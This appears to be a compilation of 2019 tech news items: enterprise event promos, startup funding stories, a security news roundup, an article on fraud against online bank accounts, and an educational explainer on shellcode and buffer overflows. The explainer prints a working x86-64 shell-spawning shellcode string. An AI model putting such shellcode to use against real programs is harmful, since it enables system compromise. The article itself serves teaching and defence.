Quantum computing is coming to TC Sessions: Enterprise on Sept. 5

Here at TechCrunch, we like to think about what’s next, and there are few technologies quite as exotic and futuristic as quantum computing. After what felt like decades of being “almost there,” we now have working quantum computers that are able to run basic algorithms, even if only for a very short time. As those times increase, we’ll slowly but surely get to the point where we can realize the full potential of quantum computing.

For our TechCrunch Sessions: Enterprise event in San Francisco on September 5, we’re bringing together some of the sharpest minds from some of the leading companies in quantum computing to talk about what this technology will mean for enterprises (p.s. early-bird ticket sales end this Friday). This could, after all, be one of those technologies where early movers will gain a massive advantage over their competitors. But how do you prepare yourself for this future today, while many aspects of quantum computing are still in development?

IBM’s quantum computer demonstrated at Disrupt SF 2018

Joining us onstage will be Microsoft’s Krysta Svore, who leads the company’s Quantum efforts; IBM’s Jay Gambetta, the principal theoretical scientist behind IBM’s quantum computing effort; and Jim Clarke, the director of quantum hardware at Intel Labs.

That’s pretty much a Who’s Who of the current state of quantum computing, even though all of these companies are at different stages of their quantum journey. IBM already has working quantum computers, Intel has built a quantum processor and is investing heavily into the technology and Microsoft is trying a very different approach to the technology that may lead to a breakthrough in the long run but that is currently keeping it from having a working machine. In return, though, Microsoft has invested heavily into building the software tools for building quantum applications.

During the panel, we’ll discuss the current state of the industry, where quantum computing can already help enterprises today and what they can do to prepare for the future. The implications of this new technology also go well beyond faster computing (for some use cases); there are also the security issues that will arise once quantum computers become widely available and current encryption methodologies become easily breakable.

The early-bird ticket discount ends this Friday, August 9. Be sure to grab your tickets to get the max $100 savings before prices go up. If you’re a startup in the enterprise space, we still have some startup demo tables available! Each demo table comes with four tickets to the show and a high-visibility exhibit space to showcase your company to attendees — learn more here.

CircleCI brings its continuous integration to Microsoft programmers for first time

CircleCI has been supporting continuous integration for Linux and Mac programmers for some time, but up until today, Microsoft developers have been left on the outside looking in. Today, the company changed that announcing new support for Microsoft programmers using Windows Server 2019.

CircleCI, which announced a $56 million Series D investment last month, is surely looking for ways to expand its market reach, and providing support for Microsoft programmers is a good place to start, as it represents a huge untapped market for the company.

“We’re really happy to announce that we are going to support Windows because customers are asking for it. Windows [comprises] 40% of the development market, according to a Stack Overflow survey from earlier this year,” Alexey Klochay, CircleCI product manager for Windows told TechCrunch.

Microsoft programmers could have used continuous integration before outside of CircleCI, but it was much harder. Klochay says that with CircleCI, they are getting a much more integrated solution. For starters, he says, developers can get up and running right away without the help of an engineer. “We give the power to developers to do exactly what they need to do at their own pace without getting locked into anything. We’re providing  ease of use and ease of maintenance,” he explained.

CircleCI also provides greater visibility across a development team. “We are also giving companies tools to get to get better visibility into what everyone is building, and how everyone is interacting with the system,” he said.

Klochay says that much of this is possible because of the changes in Windows Server 2019, which was released last year. “Because of all the changes that Microsoft has been introducing in the latest Windows Server, it has been a smoother experience than if we had to start the year ago,” he said.

Nathan Dintenfass from CircleCI says that in general, the Microsoft ecosystem has shifted in recent years to be more welcoming to the kind of approach that CircleCI provides for developers. “We have observed a maturation of the Windows ecosystem, and being more and more attracted to the kinds of teams that are investing in really high throughput software delivery automation, while at the same time same a maturation of the underlying cloud infrastructure that makes Windows available, and makes it much easier for us to operate,” he explained.

Malicious Input: How Hackers Use Shellcode

It’s Black Hat 2019 this week, with Def Con following hard on its heels, and even if you’re not going to either of these events, if you have a stake in the world of cybersecurity your social media feeds are going to be filled with plenty of “hacker talk” over the next 7 days or so. Of course, you know all about hashes in cybersecurity and how to decode Base64; you’re likely also familiar with steganography, and maybe you can even recite the history of cybersecurity and the development of EDR. But how about explaining the malicious use of shellcode? You know it has nothing to do with shell scripts or shell scripting languages like Bash, but can you hold your own talking about what shellcode really is, and why it’s such a great tool for attackers?

shellcode feature image

Not sure? No problem. We’ve got just the post for you. In the next ten minutes, we’ll take you through the basics of shellcode, what it is, how it works and how hackers use it as malicious input.

What is Shellcode?

We know shellcode has nothing to do with shell scripting, so why the name? The connection with the shell is that shellcode was originally mainly used to open or ‘pop’ a shell – that is, an instance of a command line interpreter – so that an attacker could use the shell as a means to compromise the system. Imagine if you could get a user to input some seemingly innocent string to a legitimate program on their system that would magically open a reverse shell to your machine? That’s the ultimate pwning prize. It also takes very little code to spawn a new process that will give a shell, so popping shells is a very lightweight, efficient means of attack.

In order to achieve it, you’d need to find an exploitable program and fashion some malicious input string – the shellcode – containing small chunks of executable code to force the program into popping a shell. This is possible because for most programs, in order to be useful, they need the ability to receive input: to read strings and other data supplied by the user or piped in from another program.

Shellcode exploits this requirement by containing instructions telling the program to do something it otherwise wouldn’t or shouldn’t. Of course, almost no program is going to easily misinterpret data as code without a bit of persuasion. Programs are designed to take in data only of a certain type – numbers, strings, dates and such like – and anything else of a different type will just be rejected. However, we can trick programs into treating specially-formatted strings, aka “shellcode”, as program instructions by means of another hacking conversation favorite: the buffer overflow.

What is a Buffer Overflow?

A buffer overflow occurs when a program writes data into memory that is larger than the area of memory, the buffer, the program has reserved for it. This is a programming error, as code should always check first that the length of any input data will not exceed the size of the buffer that’s been allocated. When this happens the program may crash, but maliciously-crafted input may instead allow an attacker to execute their own code when it overflows into an area of executable memory. Here’s a simple example of a buffer overflow waiting to happen.

image of buffer overflow

The program reserves 16 bytes of memory for the input, but the size of the input is never checked. If the user enters a string longer than 16 bytes, the data will overwrite adjacent memory – a buffer overflow. The image below shows what happens if you try to execute the above program and supply it with input greater than 16 bytes:

image of crash report

However, just causing a buffer overflow in a program isn’t on its own much use to attackers, unless all they want to do is bring the application to a crashing halt. While that would represent a win of sorts for attackers whose objective is some kind of denial of service attack, the greater prize in most cases is not just causing the overflow but using it as a means to take control of execution. Once this is achieved, the target device can fall under the hacker’s complete control.

Controlling Code Execution

When we create a buffer overflow, the aim is to write a sufficiently large amount of data into the program’s memory so that two things happen. First, we fill up the allocated buffer, and second we supply enough extra data so that we overwrite the address that will be executed next with our own code.

This isn’t simple, but it might sound harder to do than it actually is. Because of the nature of how program memory is mapped out, when any function is called, there’s always a pointer held in memory to the address of the next function that should be executed after the currently executing one; this pointer is known as the Instruction Pointer, sometimes referred to as EIP (32 bit) or RIP (64 bit). I’ll use RIP throughout the rest of this post, but the same observations apply to EIP.

By reverse engineering a particular program and with a lot of fuzzing and experimenting, we can determine both whether a given program contains any functions that are vulnerable to a buffer overflow and, if so, the address of the Instruction Pointer when that vulnerable function has finished calling.

Knowing the offset – the memory address – of the Instruction Pointer at that point in code means we can determine precisely how much extra data we need to overflow the buffer and insert our own code at the address of the Instruction Pointer. When we do that, the program will try to execute the code at the address we’ve written to the RIP register. If that code is junk, like in the example above, the program will crash, but if it isn’t – if it’s a valid address, things start to get more interesting.

From Buffer Overflow to Shellcode

Having achieved a buffer overflow and mapped out the memory addresses and offsets, the attacker has two options. Either the malicious input could write the address of another function of the program to RIP or the attacker could try to jump to an address in which attack code has already been inserted.

The first case may often times be all that is needed. Suppose the program contains a function that is normally only reached if the user is authorized to take that action. In such a case, the attacker can use the buffer overflow to write the address of that function directly into the Instruction Pointer, bypassing any earlier function that would have checked for authorization.

The second scenario is far more tricky. Suppose I want the program to do something it’s not programmed to do, like open up a shell? In that case, I need to overflow the buffer not just with junk or an address to jump to, but with executable code – shellcode – as well as the address of where that code begins.

How To Create Shellcode

Now that we understand the mechanism that shellcode exploits, how do we go about creating it? As we saw already, we need to send executable code in the input data, but we can’t just write a bunch of C or C++ instructions into the input.

If we want the program to write executable instructions into memory, then we need to send it raw assembly code in our string. However, there’s a difficulty.

When C-like programs read strings – an array of chars – from user input, they need to know when the input has come to an end. Character strings in C are terminated by appending a special null-byte character to the end of the character array. This null-byte character has the value of zero. It is represented by x0 in shellcode and 00 in hex. When the program encounters the null-byte character, signalling the end of the string, it will cease reading further input and move on to the next instruction in its code.

And herein lies the difficulty: the string-terminating null-byte character has the value of zero, but it is not the same thing as the integer 0. However, they both share the same hex value, 00, and are thus represented in shellcode the same way, as x0.

That means we cannot pass the integer 0 directly in our shellcode, as any x0 will be interpreted by the program as a null-byte character and signal the end of input. As a result, the rest of our code after x0 will be discarded.

In order to solve this problem and create well-formed shellcode, we need to go through several steps.

1. Create the program we want to execute in a high-level language like C. As it has to fit in a small amount of memory – the size of the buffer plus the offset to RIP – it should be as concise as possible. The shellcode used in this example, which spawns a shell via execve, is a mere 23 bytes.

2. After compiling the code and checking that it does what we expect, use a disassembler to view the raw assembly.

image of disassembly

3. Optimize the assembly, such as replacing any 00 hex with other instructions. In the image above, the first column (left of the colon) shows us the memory address, the second column shows us the opcodes and operands (program instructions) in hex, and the remaining columns on the right show us the same in a human-readable language.

This code has already been optimized. Notice at line 8 the hexadecimal 48 31 f6, which represents the instructions for the following assembly:

xor %rsi, %rsi

The use of XOR here is an example of sidestepping the restriction on not being able to use the hex 00 we mentioned above. This particular program needs to push the integer 0 onto the stack. To do so, it first loads 0 into the %rsi register. The natural way to do that would be:

mov $0x0, %rsi

But that would produce the hex 00 to represent $0x0. We can get around that by using XOR on the same value, %rsi. When both input values to XOR are the same the result will be 0, so this instruction returns 0 as a result but doesn’t require a 00 in the assembly (the opcode for XOR is 0x31 in Intel 32-bit and 64-bit architectures).

4. Next, we need to extract the hexedecimal program instructions and create a shellcode string. To do that we prefix each hex byte with x and concatenate them all as a single string.

x48x31xf6x56x48xbfx2fx62x69x6ex2fx2fx73x68x57x54x5fx6ax3bx58x99x0fx05

5. Finally, we can now feed our shellcode to a vulnerable program, or create our own and convince a user to execute it, like this one.

image of shellcode example

Some other great examples of this process can be seen here.

Protecting Against Shellcode

You would think that buffer overflows, which have been known about for decades, should be becoming rarer, but in fact the opposite is true. Statistics from the CVE database at NIST show that vulnerabilities caused by buffer overflows increased dramatically during 2017 and 2018. The number known for this year is already higher than every year from 2010 to 2016, and we still have almost 5 months of the year left to go.

image of cve statistics

Clearly, there’s a lot of unsafe code out there, and the only real way you can protect yourself from exploits that inject shellcode into vulnerable programs is with a multi-layered security solution that can not only use Firewall or Device controls to protect your software stack from unwanted connections, but also that uses static and behavioral AI to catch malicious activity both before and on execution. With a comprehensive security solution that uses machine learning to identify malicious behavior, attacks by shellcode are seen just like any other attack and stopped before they can do any damage.

Conclusion

In this post, we’ve taken a look at what shellcode is and how hackers can use it as malicious input to exploit vulnerabilities in legitimate programs. Despite the long history of the dangers of buffer overflows, even today we see an increasing number of CVEs being attributed to this vector. Looking on the bright side, attacks that utilize shellcode can be stopped with a good security solution. On top of that, if you find yourself in the midst of a thread or a chat concerning shellcode and malicious input, you should now be able to participate and see what more you can learn from, or share with, others!


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Four days left for early-bird tickets to TC Sessions: Enterprise 2019

We’re just one month away from TC Sessions: Enterprise, which takes place on September 5 at the Yerba Buena Center in San Francisco. But you have only four days left to score an early-bird ticket and save yourself $100. Right now, you pay $249, but once the clock strikes 11:59 p.m. (PT) on August 9, the bird flies south and the price flies north. Get your early-bird ticket today and save.

Focused on the current and future state of enterprise software, this day-long conference offers tremendous value — even at full price. Considering the rate at which this $500 billion industry acquires startups — and how quickly it’s evolving — TC Sessions: Enterprise makes perfect sense for enterprise-minded founders, investors, CTOs, CIOs, engineers and MBA students (student tickets cost $75).

We’ve packed the conference with interviews, panel discussions, Q&As and breakout sessions. TechCrunch editors will dig deep to separate hype from reality as they explore crucial issues, complex technologies and investment trends with both industry giants and up-and-coming startups.

Here’s a sample of just some of what we have planned. You can also check out the agenda — and we might add a few surprises along the way.

Curious about the latest in enterprise investment? TechCrunch editor Connie Loizos will interview VCs Jason Green, founder and general partner at Emergence; Maha Ibrahim, general partner at Canaan Partners; and Rebecca Lynn, co-founder and general partner at Canvas Ventures. They’ll examine trends in early-stage enterprise investments and discuss different sectors and companies that have their attention.

Maybe you want to learn from a founder who’s been there and done that. Don’t miss Aaron Levie, Box co-founder, chairman and CEO, as he outlines what it took to travel the entire startup journey. He’ll also offer his take on the future of data platforms.

Want to cover more ground at TC Sessions: Enterprise? Take advantage of our group discount and bring the whole team. Buy four or more tickets at once and save 20%. Don’t forget: For every ticket you buy to TC Sessions: Enterprise, we’ll register you for a free Expo Only pass to TechCrunch Disrupt SF on October 2-4.

TC Sessions: Enterprise takes place on September 5, but your chance to save $100 ends in just four short days. Don’t wait — buy an early-bird ticket today, and we’ll see you in September!

Is your company interested in sponsoring or exhibiting at TC Sessions: Enterprise? Contact our sponsorship sales team by filling out this form.

Cockroach Labs announces $55M Series C to battle industry giants

Cockroach Labs, makers of CockroachDB, sits in a tough position in the database market. On one side, it has traditional database vendors like Oracle, and on the other there’s AWS and its family of databases. It takes some good technology and serious dollars to compete with those companies. Cockroach took care of the latter with a $55 million Series C round today.

The round was led by Altimeter Capital and Tiger Global along with existing investor GV. Other existing investors including Benchmark, Index Ventures, Redpoint Ventures, FirstMark Capital and Work-Bench also participated. Today’s investment brings the total raised to over $110 million, according to the company.

Spencer Kimball, co-founder and CEO, says the company is building a modern database to compete with these industry giants. “CockroachDB is architected from the ground up as a cloud native database. Fundamentally, what that means is that it’s distributed, not just across nodes in a single data center, which is really table stakes as the database gets bigger, but also across data centers to be resilient. It’s also distributed potentially across the planet in order to give a global customer base what feels like a local experience to keep the data near them,” Kimball explained.

At the same time, even while it has a cloud product hosted on AWS, it also competes with several AWS database products including Amazon Aurora, Redshift and DynamoDB. Much like MongoDB, which changed its open source licensing structure last year, Cockroach did as well, for many of the same reasons. They both believed bigger players were taking advantage of the open source nature of their products to undermine their markets.

“If you’re trying to build a business around an open source product, you have to be careful that a much bigger player doesn’t come along and extract too much of the value out of the open source product that you’ve been building and maintaining,” Kimball explained.

As the company deals with all of these competitive pressures, it takes a fair bit of money to continue building a piece of technology to beat the competition, while going up against much deeper-pocketed rivals. So far the company has been doing well with Q1 revenue this year doubling all of last year. Kimball indicated that Q2 could double Q1, but he wants to keep that going, and that takes money.

“We need to accelerate that sales momentum and that’s usually what the Series C is about. Fundamentally, we have, I think, the most advanced capabilities in the market right now. Certainly we do if you look at the differentiator around just global capability. We nevertheless are competing with Oracle on one side, and Amazon on the other side. So a lot of this money is going towards product development too,” he said.

Cockroach Labs was founded in 2015, and is based in New York City.

Segment CEO Peter Reinhardt is coming to TechCrunch Sessions: Enterprise to discuss customer experience management

There are few topics as hot right now in the enterprise as customer experience management, that ability to collect detailed data about your customers, then deliver customized experiences based on what you have learned about them. To help understand the challenges companies face building this kind of experience, we are bringing Segment CEO Peter Reinhardt to TechCrunch Sessions: Enterprise on September 5 in San Francisco (p.s. early-bird sales end this Friday, August 9).

At the root of customer experience management is data — tons and tons of data. It may come from the customer journey through a website or app, basic information you know about the customer or the customer’s transaction history. It’s hundreds of signals and collecting that data in order to build the experience where Reinhardt’s company comes in.

Segment wants to provide the infrastructure to collect and understand all of that data. Once you have that in place, you can build data models and then develop applications that make use of the data to drive a better experience.

Reinhardt, and a panel that includes Qualtrics’ Julie Larson-Green and Adobe’s Amit Ahuja, will discuss with TechCrunch editors the difficulties companies face collecting all of that data to build a picture of the customer, then using it to deliver more meaningful experiences for them. See the full agenda here.

Segment was born in the proverbial dorm room at MIT when Reinhardt and his co-founders were students there. They have raised more than $280 million since inception. Customers include Atlassian, Bonobos, Instacart, Levis and Intuit .

Early-bird tickets to see Peter and our lineup of enterprise influencers at TC Sessions: Enterprise are on sale for just $249 when you book here; but hurry, prices go up by $100 after this Friday!

Are you an early-stage startup in the enterprise-tech space? Book a demo table for $2,000 and get in front of TechCrunch editors and future customers/investors. Each demo table comes with four tickets to enjoy the show.

The Risk of Weak Online Banking Passwords

If you bank online and choose weak or re-used passwords, there’s a decent chance your account could be pilfered by cyberthieves — even if your bank offers multi-factor authentication as part of its login process. This story is about how crooks increasingly are abusing third-party financial aggregation services like Mint, PlaidYodlee, YNAB and others to surveil and drain consumer accounts online.

Crooks are constantly probing bank Web sites for customer accounts protected by weak or recycled passwords. Most often, the attacker will use lists of email addresses and passwords stolen en masse from hacked sites and then try those same credentials to see if they permit online access to accounts at a range of banks.

A screenshot of a password-checking tool being used to target Chase Bank customers who re-use passwords from other sites. Image: Hold Security.

From there, thieves can take the list of successful logins and feed them into apps that rely on application programming interfaces (API)s from one of several personal financial data aggregators which help users track their balances, budgets and spending across multiple banks.

A number of banks that do offer customers multi-factor authentication — such as a one-time code sent via text message or an app — have chosen to allow these aggregators the ability to view balances and recent transactions without requiring that the aggregator service supply that second factor. That’s according to Brian Costello, vice president of data strategy at Yodlee, one of the largest financial aggregator platforms.

Costello said while some banks have implemented processes which pass through multi-factor authentication (MFA) prompts when consumers wish to link aggregation services, many have not.

“Because we have become something of a known quantity with the banks, we’ve set up turning off MFA with many of them,” Costello said.  “Many of them are substituting coming from a Yodlee IP or agent as a factor because banks have historically been relying on our security posture to help them out.”

Such reconnaissance helps lay the groundwork for further attacks: If the thieves are able to access a bank account via an aggregator service or API, they can view the customer’s balance(s) and decide which customers are worthy of further targeting.

This targeting can occur in at least one of two ways. The first involves spear phishing attacks to gain access to that second authentication factor, which can be made much more convincing once the attackers have access to specific details about the customer’s account — such as recent transactions or account numbers (even partial account numbers).

The second is through an unauthorized SIM swap, a form of fraud in which scammers bribe or trick employees at mobile phone stores into seizing control of the target’s phone number and diverting all texts and phone calls to the attacker’s mobile device.

But beyond targeting customers for outright account takeovers, the data available via financial aggregators enables a far more insidious type of fraud: The ability to link the target’s bank account(s) to other accounts that the attackers control.

That’s because PayPal, Zelle, and a number of other pure-play online financial institutions allow customers to link accounts by verifying the value of microdeposits. For example, if you wish to be able to transfer funds between PayPal and a bank account, the company will first send a couple of tiny deposits  — a few cents, usually — to the account you wish to link. Only after verifying those exact amounts will the account-linking request be granted.

Alex Holden is founder and chief technology officer of Hold Security, a Milwaukee-based security consultancy. Holden and his team closely monitor the cybercrime forums, and he said the company has seen a number of cybercriminals discussing how the financial aggregators are useful for targeting potential victims.

Holden said it’s not uncommon for thieves in these communities to resell access to bank account balance and transaction information to other crooks who specialize in cashing out such information.

“The price for these details is often very cheap, just a fraction of the monetary value in the account, because they’re not selling ‘final’ access to the account,” Holden said. “If the account is active, hackers then can go to the next stage for 2FA phishing or social engineering, or linking the accounts with another.”

Currently, the major aggregators and/or applications that use those platforms store bank logins and interactively log in to consumer accounts to periodically sync transaction data. But most of the financial aggregator platforms are slowly shifting toward using the OAuth standard for logins, which can give banks a greater ability to enforce their own fraud detection and transaction scoring systems when aggregator systems and apps are initially linked to a bank account.

That’s according to Don Cardinal, managing director of the Financial Data Exchange (FDX), which is seeking to unite the financial industry around a common, interoperable, and royalty-free standard for secure consumer and business access to their financial data.

“This is where we’re going,” Cardinal said. “The way it works today, you the aggregator or app stores the credentials encrypted and presents them to the bank. What we’re moving to is [an account linking process] that interactively loads the bank’s Web site, you login there, and the site gives the aggregator an OAuth token. In that token granting process, all the bank’s fraud controls are then direct to the consumer.”

Alissa Knight, a senior analyst with the Aite Group, a financial and technology analyst firm, said such attacks highlight the need to get rid of passwords altogether. But until such time, she said, more consumers should take full advantage of the strongest multi-factor authentication option offered by their bank(s), and consider using a password manager, which helps users pick and remember strong and unique passwords for each Web site.

“This is just more empirical data around the fact that passwords just need to go away,” Knight said. “For now, all the standard precautions we’ve been giving consumers for years still stand: Pick strong passwords, avoid re-using passwords, and get a password manager.”

Some of the most popular password managers include 1Password, Dashlane, LastPass and Keepass. Wired.com recently published a worthwhile writeup which breaks down each of these based on price, features and usability.

Mesosphere changes name to D2IQ, shifts focus to Kubernetes, cloud native

Mesosphere was born as the commercial face of the open source Mesos project. It was surely a clever solution to make virtual machines run much more efficiently, but times change and companies change. Today the company announced it was changing its name to Day2IQ or D2IQ for short, and fixing its sights on Kubernetes and cloud native, which have grown quickly in the years since Mesos appeared on the scene.

D2IQ CEO Mike Fey says that the name reflects the company’s new approach. Instead of focusing entirely on the Mesos project, it wants to concentrate on helping more mature organizations adopt cloud native technologies.

“We felt like the Mesosphere name was somewhat of constrictive. It made statements about the company that really allocated us to a given technology, instead of to our core mission, which is supporting successful Day Two operations, making cloud native a viable approach not just for the early adopters, but for everybody,” Fey explained.

Fey is careful to point out that the company will continue to support the Mesos-driven DC/OS solution, but the general focus of the company has shifted, and the new name is meant to illustrate that. “The Mesos product line is still doing well, and there are things that it does that nothing else can deliver on yet. So we’re not abandoning that totally, but we do see that Kubernetes is very powerful, and the community behind it is amazing, and we want to be a value added member of that community,” he said.

He adds that this is not about jumping on the cloud native bandwagon all of a sudden. He points out his company has had a Kubernetes product for more than a year running on top of DC/OS, and it has been a contributing member to the cloud native community.

It’s not just about a name change and refocusing the company and the brand, it also involves several new cloud native products that the company has built to serve the type of audience, the more mature organization, that the new name was inspired by.

For starters, it’s introducing its own flavor of Kubernetes called Konvoy, which it says, provides an “enterprise-grade Kubernetes experience.” The company will also provide a support and training layer, which it believes is a key missing piece, and one that is required by larger organizations looking to move to cloud native.

In addition, it is offering a data integration layer, which is designed to help integrate large amounts of data in a cloud-native fashion. To that end, it is introducing a Beta of Kudo, an open source cloud-native tool for building stateful operations in Kubernetes. The company has already donated this tool to the Cloud Native Computing foundation, the open source organization that houses Kubernetes and other cloud native projects.

The company faces stiff competition in this space from some heavy hitters like the newly combined IBM and Red Hat, but it believes by adhering to a strong open source ethos, it can move beyond its Mesos roots to become a player in the cloud native space. Time will tell if it made a good bet.

The Good, the Bad and the Ugly in Cybersecurity – Week 31

The Good

After 8 years of waiting, corporate whisteblower James Glen finally received settlement this week from Cisco Systems, who were found to have made false claims regarding video surveillance software the tech giant sold to US government buyers including Los Angeles International Airport, Washington D.C police and the US Army, Navy, Air Force and Marine Corps. Glen exposed vulnerabilities in Cisco’s Video Surveillance Manager which could allow hackers to compromise an organization’s entire network. Despite being told of the vulnerability in 2008, Cisco failed to fix the flaws until 2013 and had continued to ship the flawed software to government buyers in the meantime. The company were handed down a fine in excess of US $8m for the lawsuit filed in 2011. The case is believed to be the first successful prosecution of a cybersecurity company under the False Claims Act. Industry watchers believe it may serve as a precedent and open the way to further similar lawsuits of cyber security vendors peddling products with known vulnerabilities. 

More good news for privacy watchdogs this week as Apple announced that it would halt the practice of using human contractors to listen in to user Siri recordings. The practice had been revealed last Friday by a British newspaper. Citing contractors who had undertaken the work for Apple, the newspaper revealed that staff regularly heard snippets of confidential conversations that Siri had inadvertently picked up. Apple now say they have suspended the practice and are conducting “a thorough review”. Good to see Apple move on this in an uncharacteristically speedy and transparent fashion. 

The Bad

The big, bad news story of the week is, of course, the Capital One leak of over 100 million consumer records by ex-Amazon employee-turned-hacker Paige A Thompson. Since our report on Wednesday, further claims are emerging that Thompson, known online by her handle ‘erratic’, may have compromised other organizations aside from Capital One. These could possibly include Ford, InfoBlox, UniCredit, and the Ohio Department of Transportation. Interestingly, and perhaps reassuringly for Amazon if true given the hack could undermine a lucrative Pentagon contract, the Ohio DoT is not an AWS customer. 

In related news, CEOs beware as politicians try to use the incident to win backing for a bill that would see business leaders jailed for data breaches.

image of ron wyden tweet

The warnings keep coming – Microsoft (twice), Homeland Security and the NSA have each issued separate advisories in the last few months –  but reports suggest that the BlueKeep vulnerability still remains largely unpatched. Have organizations really learned nothing since Eternalblue, WannaCry and NotPetya? Now, Metasploit developers Rapid7 say they’re observing a significant increase in malicious RDP (Remote Desktop Protocol) activity, suggesting attackers are stepping up scans for vulnerable devices. 

image of rdp activity

Rapid7 are also readying a MetaSploit exploit module for BlueKeep to “help defenders and penetration testers demonstrate and validate risk”. Aside from the nearly 1m devices vulnerable to the wormable BlueKeep vulnerability that are exposed on the public internet, security researchers point out that this number does not take into account the unknown number of vulnerable devices on internal networks. Is your organization prepared for the first BlueKeep-powered ransomware?

The Ugly

It’s curious how privacy problems keep coming back to bite Apple, despite their public positioning as the company that takes user privacy seriously. We’ve spoken before on the dangers of Bluetooth, but now researchers have found that Apple’s Bluetooth LE protocol used in recent versions of iOS are leaking data to anyone close enough to listen in on it. Exposed data includes the current status of the device, device name, Wifi status, battery info and, in some circumstances, possibly even the cell phone number. 

image of apple privacy poster

New cybersecurity laws in China are set to hit US tech firms as Beijing looks to increase regulation on network equipment, data storage and ‘critical information infrastructure’ procured from overseas companies. Cisco and Dell, among others, could find it increasingly difficult or expensive to do business on mainland China, particularly as the exact nature of the cybersecurity laws appears to be deliberately vague while the US and China remain locked in a tit-for-tat trade war. Some suggest that China’s new cybersecurity laws may be more or less draconian for US companies depending on how things shake out in the current spat over tariffs. 


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

With the acquisition closed, IBM goes all in on Red Hat

IBM’s massive $34 billion acquisition of Red Hat closed a few weeks ago and today, the two companies are now announcing the first fruits of this process. For the most part, today’s announcement furthers IBM’s ambitions to bring its products to any public and private cloud. That was very much the reason why IBM acquired Red Hat in the first place, of course, so this doesn’t come as a major surprise, though most industry watchers probably didn’t expect this to happen this fast.

Specifically, IBM is announcing that it is bringing its software portfolio to Red Hat OpenShift, Red Hat’s Kubernetes-based container platform that is essentially available on any cloud that allows its customers to run Red Hat Enterprise Linux.

In total, IBM has already optimized more than 100 products for OpenShift and bundled them into what it calls “Cloud Paks.” There are currently five of these Paks: Cloud Pak for Data, Application, Integration, Automation and Multicloud Management. These technologies, which IBM’s customers can now run on AWS, Azure, Google Cloud Platform or IBM’s own cloud, among others, include DB2, WebSphere, API Connect, Watson Studio and Cognos Analytics.

“Red Hat is unlocking innovation with Linux-based technologies, including containers and Kubernetes, which have become the fundamental building blocks of hybrid cloud environments,” said Jim Whitehurst, president and CEO of Red Hat, in today’s announcement. “This open hybrid cloud foundation is what enables the vision of any app, anywhere, anytime. Combined with IBM’s strong industry expertise and supported by a vast ecosystem of passionate developers and partners, customers can create modern apps with the technologies of their choice and the flexibility to deploy in the best environment for the app – whether that is on-premises or across multiple public clouds.”

IBM argues that a lot of the early innovation on the cloud was about bringing modern, customer-facing applications to market, with a focus on basic cloud infrastructure. Now, however, enterprises are looking at how they can take their mission-critical applications to the cloud, too. For that, they want access to an open stack that works across clouds.

In addition, IBM also today announced the launch of a fully managed Red Hat OpenShift service on its own public cloud, as well as OpenShift on IBM Systems, including the IBM Z and LinuxONE mainframes, as well as the launch of its new Red Hat consulting and technology services.